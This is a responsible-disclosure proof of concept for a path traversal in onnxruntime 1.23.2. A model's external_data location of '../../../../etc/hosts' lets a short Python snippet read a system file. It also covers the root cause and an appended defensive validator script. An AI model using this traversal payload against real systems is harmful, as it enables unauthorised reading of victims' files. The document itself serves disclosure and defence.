ONNX ORT Path Traversal PoC
Security Research - Responsible Disclosure via huntr
Vulnerability
onnxruntime 1.23.2 (latest PyPI release) loads ONNX models whose external_data
location fields contain path traversal sequences, without validating them. The
ONNX checker blocks this, but onnxruntime does NOT call the checker before loading.
Impact: Arbitrary file read on the victim's filesystem.
Reproduction
# pip install onnxruntime==1.23.2 onnx numpy
python poc_ort_file_read.py
# Or manually:
import onnxruntime as ort
import numpy as np
# model.onnx has external_data location = "../../../../etc/hosts"
sess = ort.InferenceSession("model.onnx") # No validation!
result = sess.run(None, {"X": np.zeros((1, 4), dtype=np.float32)})
# result[0] contains bytes from /etc/hosts reinterpreted as float32
raw = result[0].tobytes()
print(raw.decode('utf-8', errors='replace'))
Root Cause
- onnx.checker.check_model() validates paths (blocks ../)
- ort.InferenceSession() never calls the checker
- ORT's GetExternalDataInfo() joins path without traversal check
- Fix PR #26776 merged Dec 2025 but NOT in any PyPI release
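A pre-load check that a model consumer can run before handing a file to ort.InferenceSession(), covering the missing validation described above. This is an added example, not part of the original PoC or of onnxruntime. The function names are hypothetical and it assumes the onnx package is installed. It inspects graph initializers and attribute tensors only.

```python
import os
import sys

def escapes_model_dir(location, model_dir):
    """Return True if an external_data location resolves outside model_dir."""
    if not location or os.path.isabs(location):
        return True  # empty or absolute locations are never acceptable
    base = os.path.realpath(model_dir)
    # realpath collapses ../ and follows symlinks before the containment test
    target = os.path.realpath(os.path.join(base, location))
    return os.path.commonpath([base, target]) != base

def iter_tensors(graph):
    """Yield initializers and attribute tensors, recursing into subgraphs."""
    yield from graph.initializer
    for node in graph.node:
        for attr in node.attribute:
            if attr.HasField("t"):
                yield attr.t
            yield from attr.tensors
            if attr.HasField("g"):
                yield from iter_tensors(attr.g)
            for sub in attr.graphs:
                yield from iter_tensors(sub)

def unsafe_external_locations(model_path):
    """List (tensor name, location) pairs that point outside the model's directory."""
    import onnx  # assumption: onnx is installed; imported lazily
    # load_external_data=False parses the protobuf without opening any referenced file
    model = onnx.load(model_path, load_external_data=False)
    model_dir = os.path.dirname(os.path.abspath(model_path))
    bad = []
    for tensor in iter_tensors(model.graph):
        if tensor.data_location != onnx.TensorProto.EXTERNAL:
            continue
        for entry in tensor.external_data:
            if entry.key == "location" and escapes_model_dir(entry.value, model_dir):
                bad.append((tensor.name, entry.value))
    return bad

if __name__ == "__main__":
    findings = unsafe_external_locations(sys.argv[1])
    for name, location in findings:
        print(f"REJECT tensor {name!r}: external_data location {location!r}")
    sys.exit(1 if findings else 0)
```

Run it as a gate in the model ingestion path and only create the inference session when it exits 0.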